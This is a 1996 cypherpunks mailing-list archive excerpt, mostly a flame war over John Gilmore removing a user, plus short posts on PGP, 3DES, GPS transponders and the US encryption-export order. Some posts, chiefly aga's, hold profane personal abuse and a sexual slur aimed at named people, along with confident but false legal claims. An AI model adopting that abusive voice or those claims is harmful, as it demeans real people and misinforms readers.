you there Mr. "InterNet", but the way it works is that either organizations
or individuals own lists, in this case it's an individual.)

> 
> The first time is the time when you lose all credibility, and there
> is never any forgiveness for a plug-puller.
> 

All bullshit aside, this whole thing has NOTHING to do with crypto.
And it has very VERY little to do with censorship either. And it's
gotten way, way out of hand. I suggest that it might be better not
to spam cypherpunks with this stuff, and to give it a rest. Between
the 2 lists & various people I see represented here, with all due &
serious respect, you folks have GOT to have better, more important,
and far more deserving issues to devote your time to. I would hope
that you would take a few moments and think about those things, and
consider acting appropriatly in light of those thoughts.

Tim Scanlon







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 16 Nov 1996 02:26:42 -0800 (PST)
To: jim bell <jimbell@pacifier.com>
Subject: Re: Conspiring to commit voodoo
In-Reply-To: <199611150326.TAA07305@mail.pacifier.com>
Message-ID: <Pine.SUN.3.94.961116052424.15846A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Nov 1996, jim bell wrote:

> This story further confirms my lack of respect for Unicorn.  

Mr. Bell, if you keep complimenting me I'll begin to think perhaps I'm
being hit on.


--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Sat, 16 Nov 1996 02:27:58 -0800 (PST)
To: Bill Frantz <frantz@netcom.com>
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <199611152058.MAA26315@netcom6.netcom.com>
Message-ID: <Pine.LNX.3.95.961116051946.3091I-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Nov 1996, Bill Frantz wrote:

> Date: Fri, 15 Nov 1996 13:02:04 -0800
> From: Bill Frantz <frantz@netcom.com>
> To: snow <snow@smoke.suba.com>, Dave Hayes <dave@kachina.jetcafe.org>,
>     aga <aga@dhp.com>
> Cc: declan@well.com, cypherpunks@toad.com
> Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
> 
> aga <aga@dhp.com> wrote:
> >Let's stay on topic here -- John Gilmore is a censorous asshole
> >for pulling Vulis's plug.  The topic has nothing to do with
> >the Freedom-Knights.
> 
> At 12:19 AM 11/15/96 -0600, snow wrote:
> >> [This is a rebuttal to a misguided news article.]
> >> > Cypher-Censored
> >> > By Declan McCullagh (declan@well.com)
> >> >    The list is on Gilmore's machine and he can do what he wants with
> >> >    it; he can moderate the postings, he can censor material, he can
> >> >    shut the whole thing down. By kicking off an offending user, a
> >> >    list owner merely exercises his property right. There's no
> >> >    government involvement, so the First Amendment doesn't apply. And
> >> >    the deleted, disgruntled user is free to start his own mailing
> >> >    list with different rules.
> >> 
> >> Notice how, once the opposition is admitted to, the rationalization
> >> begins. Suddenly this is not a matter of censorship, but of ownership.
> >> Just as suddenly, the classic anti-free-speech arguments of "if you
> >> don't like it, start yer own" begin to surface. (Anyone ever notice
> >> how this resembles the "love it or leave it" mentality of certain
> >> American patriotic organizations?)
> >
> >     It still isn't censorship. Censorship, at least in my dictionary, 
> >refers to censor, which uses the word "Official" several times. Mr. 
> >Gilmore is not an "Official" in a government sense, he maybe in the EFF
> >sense, but this is not an "Official" EFF organ, so that doesn't count. 
> 
> Even more important is the fact that Mr. Gilmore did not prevent Mr. Vulis
> from speaking.  No restraint on speech implies no censorship.  Therefor Mr.
> Vulis was not censored.  Q.E.D.
> 
> You all are perfectly free to like or not like what Mr. Gilmore did. 
> However, don't call it censorship because it wasn't.
> 

Yes it WAS!!  He censored the mode and manner of the speaker.
He censored the personal attacks and the rants and the racial
diatribes!  And that SUCKS!  Gilmore was a fucking asshole for
doing it!  And Gilmore is the WORST kind of censor that there
can be, one who censors a person's "style."

-aga.admin
InterNet Freedom Council





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Sat, 16 Nov 1996 03:00:05 -0800 (PST)
To: Dave Kinchlea <security@kinch.ark.com>
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <Pine.LNX.3.95.961115150539.8326C-100000@kinch.ark.com>
Message-ID: <Pine.LNX.3.95.961116053753.3091K-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Nov 1996, Dave Kinchlea wrote:

> Date: Fri, 15 Nov 1996 15:18:12 -0800 (PST)
> From: Dave Kinchlea <security@kinch.ark.com>
> To: aga <aga@dhp.com>
> Cc: cypherpunks@toad.com
> Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News 
> 
> So, you send all of your snail mail on post cards do you? No
> sealed envelopes at all? Afterall you have nothing to hide, right?
> 

Irrelevant analogy; snail.mail and e-mail.  The former is in physical
form, and the latter usually never is.

> Of course not, privacy isn't about being a criminal, its about being
> private. It is not akin to anonymity, *perhaps* those who work
> anonymously have `something to hide' (still doesn't necessarily make
> them a criminal, however), 

Anonymity on the InterNet is a Constitutional right, and is the
sole supporter of freedom of speech.

> I'll let someone else field that as I feel
> that anonymity is rarely a good thing. 
> 

I disagree, anonymity is a good thing that will never
be questioned by anybody, but your PGP will, and it
is really not safe anyway.

> Privacy, on the other hand, simply means that not everything I do is any
> of your business and I would just as soon you not be tempted to even
> bother trying to find out. 
> 

If you do not send it to me by e-mail, I will never see it.
Why are you so paranoid that someone is reading your e-mail?
I never do anything criminal, so I could give a shit less if
everybody reads all of my fucking mail.

> Of course, if all of your personal mail (including financial statements
> etc) is sent on post cards, then (while I think you would be crazy) I
> will at least admit you are consistent. Else, I think you need to look
> hard at the logic you are using.
> 

Again, inconsistant analogy.  This is nothing but photons in it's
ultimate form, and it will never see paper.  Anything that _you_
print is not attributable to me, and any e-mail printed by you
would never be acceptable as a court exhibit.

stop getting cyberspace mixed up with print.

why do you put that cypherpunks address in the header?
just where did this e-mail originate from?

Steve, are you on that cypherpunks list?

-aga





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Sat, 16 Nov 1996 03:13:14 -0800 (PST)
To: Bryondp@aol.com
Subject: Re: Censor John Gilmore -- EFF is a disgrace!
In-Reply-To: <961115203806_1150025335@emout03.mail.aol.com>
Message-ID: <Pine.LNX.3.95.961116061123.3091N-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Nov 1996 Bryondp@aol.com wrote:

> Date: Fri, 15 Nov 1996 20:38:08 -0500
> From: Bryondp@aol.com
> To: aga@dhp.com
> Cc: dave@kachina.jetcafe.org, ifc@pgh.org, declan@well.com,
>     cypherpunks@toad.com
> Subject: Re: Censor John Gilmore -- EFF is a disgrace!
> 
> take me off this fucking list
> 

you ain't on any of my lists, dude.
like what fucking list are you on, anyway?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Sat, 16 Nov 1996 04:01:06 -0800 (PST)
To: Tim Scanlon <tfs@adsl-122.cais.com>
Subject: Does John Gilmore suck tale's cock, too?
In-Reply-To: <9611161024.AA00954@adsl-122.cais.com>
Message-ID: <Pine.LNX.3.95.961116064606.3091R-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 16 Nov 1996, Tim Scanlon wrote:

> Date: Sat, 16 Nov 1996 05:24:56 -0500 (EST)
> From: Tim Scanlon <tfs@adsl-122.cais.com>
> To: Stephen Boursy <rent_control@msn.com>
> Cc: aga@dhp.com, freedom-knights@jetcafe.org, cypherpunks@toad.com,
>     dave@kachina.jetcafe.org, declan@well.com, ifc@pgh.org
> Subject: Re: Censor John Gilmore -- EFF is a disgrace!
> 
> Stephen Boursy wrote, along with a horde of others with no lives:
> [lots of worthless crap snipped out]
> > 
> > None of that analogy is applicable to the cyberpunks list.
> > When a list gets as big as that, it it no longer to be considered
> > a "mailing-list" but it is a _public_ forum.  The whole problem
> > here is the abuse of power by both the EFF and John Gilmore.
> > 
> It's not an abuse of power. It was an effort to curtail inappropriate
> SPAM. Much like this entire topic has become non-crypto SPAM on the
> cypherpunks list. 
> > 

No it was not SPAM.  John Gilmore attacked Vulis's style, plain
and simple.  Next time I see John GilMore, I will call him a
censorous motherfucker in public.

> >   Well then let's put their precious censored mailing list in 
> > the public domain.
> 
> Hmm, above that you tried to argue that it wasn't a list, but a
> "public forum", logicly then you state that it is allready in
> the "public domain". Then you turn around and say it isn't, and
> should be taken from a private forum into the "public domain".
> Perhaps if you stopped ranting, you might realize your mistake. 
> 

You missed the whole fucking point, and I ain't going
to waste time saying it again.

> > 
> > 
> > Wrong!  The cyberpunks mailing list is PUBLIC property and should
> > NOT be controlled by John Gilmore!  This just goes to show the real
> > facist censorship motives that the EFF has behind it.
> 
> Ahh, but you previously said it wasn't public property. 
> That aside, just because you say it is, doesn't mean it's so. Now
> I realize that up there at MonopolySoft, that sort of logic actually
> works, but in the real world it doesn't. The content may very well be
> "public property" as such, but the list itself, and where it resides
> are not public property. 
> 
> > 
> > Time to kill the EFF, and let it rot in hell.  They are disgrace
> > to the entire InterNet community.  I run 6 different mailing lists,
> > and have NEVER puled the plug on anyone, even when they criticize me.
> 
> Please, the EFF is NOT a Cypherpunks organization. They may share
> some of the same goals, but they arn't the same. This should be obvious
> to even the most logicly deficient. 
> Oh, and it's spelled "internet", 

No it is not, asshole!  That is the old way of doing things.
It is NOW and always will be the "InterNet" -- I helped build the
motherfucker in 1969, I should know.


and when use inside a sentance, it isn't
> capitolized, no matter what Bill tells you. 

No, it is capitalized, because Grubor tells you.
The name is the GruBoursyNet.

> And if you pulled the plug
> on any of your 6 lists, the members would have the option of reforming
> another list someplace else, but it would be YOUR OPTION to pull the
> plug, unless you were "only" the adminstrator, and not the list "owner".
> John owns the list in the classic sense. (Ok I realize I may have lost
> you there Mr. "InterNet", but the way it works is that either organizations
> or individuals own lists, in this case it's an individual.)
> 
> > 
> > The first time is the time when you lose all credibility, and there
> > is never any forgiveness for a plug-puller.
> > 
> 
> All bullshit aside, this whole thing has NOTHING to do with crypto.
> And it has very VERY little to do with censorship either. And it's
> gotten way, way out of hand. I suggest that it might be better not
> to spam cypherpunks with this stuff, and to give it a rest. Between

I never would join that mailing list, because it is all a bunch
of shit.  The EFF must die, and that is all there is to it.

> the 2 lists & various people I see represented here, with all due &
> serious respect, you folks have GOT to have better, more important,
> and far more deserving issues to devote your time to. I would hope
> that you would take a few moments and think about those things, and
> consider acting appropriatly in light of those thoughts.
> 
> Tim Scanlon
> 

Look Tim, you ain't even on the IFC or the F-K lists, so
what the fuck do you care anyway?  Just go publish this shit
on UseNet, like Mr. Boursy says you should do, and stop
bothering our mailing lists.

Stupid pervert cabal.cocksucker, I bet.

Does John Gilmore suck tale's cock, too?

-aga





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <amp@pobox.com>
Date: Sat, 16 Nov 1996 04:50:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: National Emergency
Message-ID: <01IBWMRFDH409BVDF2@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Sat Nov 16 06:48:39 1996
 
> I know that the WhiteHouse.gov site has Clinton's EO's (searchable, or,
> with a little finagling, a list of them), but I want *all* of them.
> 
> I'd love to see a site which has all these things.

as would i.

i'd appreciate it if anyone with access to same could post a url or mail me 
about it. 

amp
===
amp@pobox.com
Earth First! We'll strip mine the other planets later!
===
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMo24KVUbR1RWr40pAQHgLwf+PJBccxl5eKIyxoK1AWodP5WYPioIP1SN
zqXo1eNL3CiK/e+UOYJRO4anLpdaZvo/1KJZAsaBZue/OsWqXFkLa67ziGygfZqG
fPCCR5yOuSNS/dKFCW4pbEHWDjw4mw59wmws+xQy5uuZp6seLfduuzdaGLS+HIYn
Ad3weBoafThhtZ47w9DR71ZWFOL2FVvBJNJDhcdN/7zyhBGdhkMics+1EdbI1Z83
Ypu3Uyj9iMk68CrcdRfRTBa0tZq4vSRmFaifzYWgiocIlrit6Bdm4GYueS5Y2Dor
kSLpBo34bgWx1bgofx8qCwKZZka+DE3IGixaeJUspVLL4GYIZSsADQ==
=B+cq
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Lesher / hated by RBOC's in 5 states" <wb8foz@wauug.erols.com>
Date: Sat, 16 Nov 1996 04:54:11 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: It is getting easier
In-Reply-To: <199611152058.MAA26324@netcom6.netcom.com>
Message-ID: <199611161254.HAA17949@wauug.erols.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Frantz sez:
> 
> At 11:25 PM 11/14/96 -0800, Lucky Green wrote:
> >If I remember correctly, some of the newer transponders used on 
> >commercial aircraft actually transmit GPS data back to the controller in 
> >real time. I wonder how long it will be before the FAA will include such 
> >information in their database.
> 
> I don't think new transponders make much difference.  The old ones heighten
> the radar image of the airplane which gives an accurate 2D position.  This

I missed how this got the 'Punk material, but a friend is running
parts of a test of this.

The en-route radar is roughly the same age as those IBM 360's in the
Centers that you keep hearing about. 

The current approach is radar, [?2 ghz] with interrogation of a
1 ghz transponder via the same array. The xponder has 4 octal digits
and {Mode C} the altitude from an accompanying encoding altimeter.

So the alternate approach is a GPS receiver with a transponder
replying to interrogations with position and altitude. For the most
part, in the "en-route" stage, the futzing by DOD is not a concern
-- all receivers in a given area are equally deceived. [Recall that
the goal is to avoid Delhi incidents.]

During departure and approach, the a/c will use 'differential GPS'
whereby a GPS RX at a known benchmark on the airport will broadcast
what error IT sees. [Errors are roughly linear within X mile zone.]
DGPS will be as good or better than many existing Instrument Landing
Systems, i.e. a few feet in all 3 dimensions...


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Fri, 15 Nov 1996 22:09:05 -0800 (PST)
To: snow <hyperlex@hol.gr (George A. Stathis)
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
Message-ID: <199611161007.IAA06044@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


At 01:19 ìì 15/11/1996 -0600, snow wrote:
>> Hey man, do they sell "FREEDOM KITS" in American Supermarkets? :-)
>> ROTFL!
>
>      Nope, you have to make your own. The Kit is mostly Education, which
>is available to all. 

Pity; I thought them kits came with a Free Modem Trial Offer! ROTFL! :-)

Seriously, of course...
You have a point there, but... who will educate our educators?
-(if part of this "education" hinders and discourages our Liberty)?




>> >> Just as suddenly, the classic anti-free-speech arguments of "if you
>> >> don't like it, start yer own" begin to surface. (Anyone ever notice
>> >> how this resembles the "love it or leave it" mentality of certain
>> >> American patriotic organizations?)
>> >     It still isn't censorship. Censorship, at least in my dictionary,=20
>> >refers to censor, which uses the word "Official" several times.
>> You mean that if... Dr. Dimitri Vulis hires a Mafia-man to kill ya,=20
>> (to silence you) this wouldn't be censorship, since it would not be
>> "Official"  ? :-)
>
>     It would not be censorship, it would be Conspiracy to murder (I 
>believe, the Legal types could give you the proper charge) on Vulis's part,
>and attempted murder on the Hit Man's part. 

Even Worse! Some dictatorships, as you know, use this type of murder
continually... Even democracies in fact, if we remember JF KEnnedy et.al.

In a _philosophical_ sense, such acts of violence are indeed censorship,
(in the wider sense) of the most brutal kind.
Of course, I agree that in a _dictionary_ sense, you are mostly right...

HOWEVER: It is part our DUTY as Free Men to OVERCOME a serious FALLACY of
most EDUCATION: equating Wider Truths with Narrow Dictionary Definitions.

- I would call these Truths "broader" but I wouldn't like the joke about
  Open Minds liking... Wide Broads!  (Ever heard it?)  ROTFL!!! :-)






>> e.g. Just as aga tolerates me and vice versa, so should Gilmore
>> tolerate Dimitri Vulis.=20
>
>     It wan't his opnions, it was his actions. That is the difference.

There is no difference. Aga is a great guy who in a moment of nationalistic
misunderstanding, called me a number of bad names. And so did I. These are
what you call "actions". They are completely harmless. I am more concerned
about the... flies sitting on the surface of my monitor, hindering my eyes.

So-called "unacceptable" (speech-)acts are less dangerous than FLIES!
:-)

Best Regards and Surrealistic Greek Greetings
George







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Kinchlea <security@kinch.ark.com>
Date: Sat, 16 Nov 1996 08:04:54 -0800 (PST)
To: aga <aga@dhp.com>
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <Pine.LNX.3.95.961116053753.3091K-100000@dhp.com>
Message-ID: <Pine.LNX.3.95.961116074506.1181B-100000@kinch.ark.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 16 Nov 1996, aga wrote:

> On Fri, 15 Nov 1996, Dave Kinchlea wrote:
> 
> > 
> > So, you send all of your snail mail on post cards do you? No
> > sealed envelopes at all? Afterall you have nothing to hide, right?
> > 
> 
> Irrelevant analogy; snail.mail and e-mail.  The former is in physical
> form, and the latter usually never is.

No kidding, thanks for that information. Perhaps you can explain how it
is relevant?

> 
> > Of course not, privacy isn't about being a criminal, its about being
> > private. It is not akin to anonymity, *perhaps* those who work
> > anonymously have `something to hide' (still doesn't necessarily make
> > them a criminal, however), 
> 
> Anonymity on the InterNet is a Constitutional right, and is the
> sole supporter of freedom of speech.

Another irrelevant and completely inaccurate point. I utilize free
speech everyday yet I manage to do it without anonymity. 

> 
> > I'll let someone else field that as I feel
> > that anonymity is rarely a good thing. 
> > 
> 
> I disagree, anonymity is a good thing that will never
> be questioned by anybody, but your PGP will, and it
> is really not safe anyway.

ha ha ha, not by anybody huh. What world do you live in? I know plenty
of people who feel that if you must say something anonymously `you must
be hiding something, probably a criminal!'. I don't subscribe to this, I
feel that most people who post anonymously are just chicken-shits, but
that too is besides the point. It *is* questioned by many people.

 And as to PGP not being safe, perhaps you could expand a bit on this,
it hasn't hurt me or anyone I know, seems pretty safe to me. To address
what I assume your point was, it acts as a prefectly good sealed
envelope (and I believe quite a bit more), in the context of my original
reply, this is quite `safe'.

> 
> > Privacy, on the other hand, simply means that not everything I do is any
> > of your business and I would just as soon you not be tempted to even
> > bother trying to find out. 
> > 
> 
> If you do not send it to me by e-mail, I will never see it.

Nor will you see my post-card that I send to my mom, how does that
change the nature of a post-card OR email?

> Why are you so paranoid that someone is reading your e-mail?

Paranoid? No, but why make it easy for anyone to do so? 

> I never do anything criminal, so I could give a shit less if
> everybody reads all of my fucking mail.

so how is it different, besides being electronic, from snail mail? I
repeat, why don't you use post-cards exclusively for mail? Oh yes, that
is `print', a totally different thing, geesh.

> 
> > Of course, if all of your personal mail (including financial statements
> > etc) is sent on post cards, then (while I think you would be crazy) I
> > will at least admit you are consistent. Else, I think you need to look
> > hard at the logic you are using.
> > 
> 
> Again, inconsistant analogy.  This is nothing but photons in it's
> ultimate form, and it will never see paper.  Anything that _you_
> print is not attributable to me, and any e-mail printed by you
> would never be acceptable as a court exhibit.

You appear to be confused, I look at what I wrote and I see nothing at
all that mentions courts. I am talking about personal privacy and the
analogy is not at all inconsistent. (and paper mail is nothing but atoms
in it's ultimate form, so what?)
> 
> stop getting cyberspace mixed up with print.

Why do you think there is something magical about `cyberspace'? Privacy
is privacy, period. Communication is communication, period. There is no
reason to differentiate private communication via print and private
communication via cyberspace. Both are desirable for exactly the same
reasons. 

 > 
> why do you put that cypherpunks address in the header?
> just where did this e-mail originate from?

Thats how it landed on my plate, thats where I send it back, seems
reasonable to me.
 
cheers, kinch






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. Jai Maharaj" <jai@aloha.com>
Date: Sat, 16 Nov 1996 10:17:23 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: THAT is what makes John Gilmore an ASSHOLE!
Message-ID: <Pine.BSI.3.95.961116081616.29915A-100000@aloha.com>
MIME-Version: 1.0
Content-Type: text/plain


>> time for the alt.asshole.john-gilmore newsgroup
 
> An excellent idea, Dr. Grubor! Shall we newgroup
> alt.flame.john-gilmore or alt.bonehead.john-gilmore
> or both?
 
In that case, can Gilmore's inclusion in the NetScum
site at   http://www.mindspring.com/~netscum   be far behind?
 
Jai Maharaj
%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:%:% Om Shanti %:%:%
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sat, 16 Nov 1996 05:44:06 -0800 (PST)
To: mccoy@communities.com (Jim McCoy)
Subject: Re: Members of Parliament Problem
In-Reply-To: <v03007804aeb2a16c7fc4@[205.162.51.35]>
Message-ID: <199611161321.IAA03313@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


Jim McCoy wrote:
| Lucky writes:

For the record, this was Peter Hendrickson, not me.

| >> At 9:32 AM 11/15/1996, Adam Shostack wrote:
| >> I've been toying with schemes that multiply the Ns from everybody's
| >> public key to create a new semi-anonymous public key.  The only
| >> problem is that in each case either identity is revealed or the
| >> person seeking semi-anonymously reveals their secret key.  So,
| >> I am not quite there.  ;-)
| >
| >I think that Chaum wrote some papers on group signatures. I'll try to dig
| >them out. But it probably won't be before Sunday.

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clay Olbon II <clay.olbon@dynetics.com>
Date: Sat, 16 Nov 1996 05:27:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PGP3.0 & ElGamal
Message-ID: <1.5.4.32.19961116132534.00685bf4@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:06 PM 11/14/96 -0800, you wrote:
>> 
>> I'm still mildly curious as to why support for >128 bit keys is not
>> available in any form I know of.
>
>	What do you mean? 3DES ships with Stronghold, and will ship
>with C2Net's other products as well.

Yes, but I believe 3DES has an effective key length of only 112 bits.  Of
course, even this is more than sufficient for a long time to come. 

        Clay

>
>-- 
>Sameer Parekh					Voice:   510-986-8770
>President					FAX:     510-986-8777
>C2Net
>http://www.c2.net/				sameer@c2.net
>
>
*******************************************************
Clay Olbon			clay.olbon@dynetics.com
engineer, programmer, statistitian, etc.
Dynetics, Inc.
**********************************************tanstaafl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 16 Nov 1996 08:39:15 -0800 (PST)
To: aga <aga@dhp.com>
Subject: Re: Does John Gilmore...
In-Reply-To: <Pine.LNX.3.95.961116064606.3091R-100000@dhp.com>
Message-ID: <Pine.SUN.3.91.961116081612.19901D-100000@crl4.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sat, 16 Nov 1996, aga wrote:

> The cyberpunks mailing list is PUBLIC property and should NOT
> be controlled by John Gilmore!  This just goes to show the real
> facist censorship motives that the EFF has behind it.

I have a suggestion for "Aga" and others who believe this sort of
nonsense.  Please do us all a favor and try to sue John.  I'm sure 
that among all jack-leg and wannabe lawyers on this list that they
can come up with a viable cause of action.  And John has deep 
pockets; you could (literally) make out like bandits AND rescue 
"freedom of speech" on privately maintained mailing lists.  You 
could be heroes (or look ten times as foolish as you already do).


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Sat, 16 Nov 1996 05:41:57 -0800 (PST)
To: Cypherpunks <cypherpunks@toad.com>
Subject: San Jose Mercury News declares encryption battle over
Message-ID: <199611161340.IAA28024@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain



  Headline:  Encryption battle ends peacefully

             Technology will block circuitry in exports without U.S.
             licensing

  Byline:    BY RORY J. O'CONNOR
             Mercury News Washington Bureau

  Date:      Published: Nov. 16, 1996

  Opening:   WASHINGTON -- Computer companies and the federal
             government appear to have peacefully resolved a fierce
             battle over the export of powerful coding software in
             computers.

             The computer makers plan to use new technology that would
             block the use of code circuitry in exported computers
             unless both buyer and seller obtain licenses in this
             country.

             The coding software is designed to help people prevent
             their electronic mail, files, credit-card numbers and the
             like from being read by hackers and thieves.

  URL:      http://www.sjmercury.com/business/compute/encrypt1115.htm 

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu
		     URL:  http://samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 16 Nov 1996 10:45:34 -0800 (PST)
To: Alan Olsen <alan@ctrl-alt-del.com>
Subject: Re: Giving Kill Files a Workout...
In-Reply-To: <3.0b36.32.19961116015217.00e4c738@mail.teleport.com>
Message-ID: <328DF064.740B@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Alan Olsen wrote:
> What a week!  What is this?  "Net Loon pig-pile on Cypherpunks day?"
> So far i have killfiled three people in the past two days.  (That is the
> total number I filtered to trash before that date.)
> For those of you who are sick of wading through this mess, I am willing to
> show you what it will take to filter those of your choice to /dev/null or
> its local equivelent. (procmail can be your friend!)

Thank you in advance for your filtering instructions (yawn).

BTW, why would anyone give a shit whether you killfiled anyone or not?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 16 Nov 1996 08:54:24 -0800 (PST)
To: aga <aga@dhp.com>
Subject: Re: AGA'S LIMITED VOCABULARY
In-Reply-To: <199611161028.EAA12575@mailhost.onramp.net>
Message-ID: <Pine.SUN.3.91.961116083904.19901E-100000@crl4.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sat, 16 Nov 1996, legal expert aga wrote:

> ...cypherpunks is an "all or nothing" proposition...After a
> certain level, EVERYTHING reaches the "public doamin," and that
> is the *common-law of cyberspace.*

As I'm sure aga knows, "common law" is that form of jurisprudence 
in which cases of first which are appealed to a higher court set
legal precedents which are subsequently binding on lower courts.

I must admit, it appears "Aga" has the advantage of me, as I did
not study the *common-law of cyberspace* back when I was in law
school.  (Unfortunately, my education pre-dates the existance of
cyberspace.)

As a favor to me and other's on the list who would like to know
as much as "Aga" does about the *common-law of cyberspace* I ask
"Aga" to please share his knowledge with us.  For starters, a 
list of the most relevant appelate cases embodied in the *common-
law of cyberspace* would be appreciated.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Sat, 16 Nov 1996 09:11:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Clipper 3.11 executive order
In-Reply-To: <Pine.SUN.3.95.961115171049.27778D-100000@viper.law.miami.edu>
Message-ID: <v03007802aeb3a1bae4a1@[17.219.103.51]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----BY SAFEMAIL-----

In a message to Cypherpunks, Professor Froomkin referenced a presidential
press release concerning Clipper.
  http://library.whitehouse.gov/PressReleases.cgi?date=0&briefing=4

Note that this URL will give you today's briefing. To find the
original, you'll have to scan back through the website to find
November 15th, or you can read the rest of this long message.

Martin Minow
minow@apple.com

                           THE WHITE HOUSE

                    Office of the Press Secretary

  _______________________________________________________________

  For Immediate Release                         November 15, 1996



                        TEXT OF A LETTER FROM
                   THE PRESIDENT TO THE SPEAKER OF
                   THE HOUSE OF REPRESENTATIVES AND
                     THE PRESIDENT OF THE SENATE


                          November 15, 1996



  Dear Mr. Speaker:     (Dear Mr. President:)

  In order to take additional steps with respect to the
  national emergency described and declared in Executive
  Order 12924 of August 19, 1994, and continued on August 15,
  1995, and August 14, 1996, necessitated by the expiration of
  the Export Administration Act (EAA) on August 20, 1994, I hereby
  report to the Congress that pursuant to section 204(b) of the
  International Emergency Economic Powers Act, 50 U.S.C. 1703(b)
  (the "Act"), I have today exercised the authority granted by the
  Act to issue an Executive order (a copy of which is attached) to
  revise the provisions that apply to the administration of the
  export control system maintained by Department of Commerce in
  the Export Administration Regulations, 15 CFR Part 730 et seq.

  The new Executive order relates to my decision to transfer
  certain encryption products from the United States Munitions
  List administered by the Department of State to the Commerce
  Control List administered by the Department of Commerce.
  When I made that decision I also decided to amend Executive
  Order 12981 of December 5, 1995, which sets forth procedures
  for the interagency review and disposition of dual-use export
  license applications, to include the Department of Justice
  among the agencies that have the opportunity to review such
  applications with respect to encryption products transferred
  to Department of Commerce control.

  Also, in issuing the new order, I provided for appropriate
  controls on the export and foreign dissemination of encryption
  products transferred to the Department of Commerce.  Among
  other provisions, I determined that the export of encryption
  products transferred to Department of Commerce control could
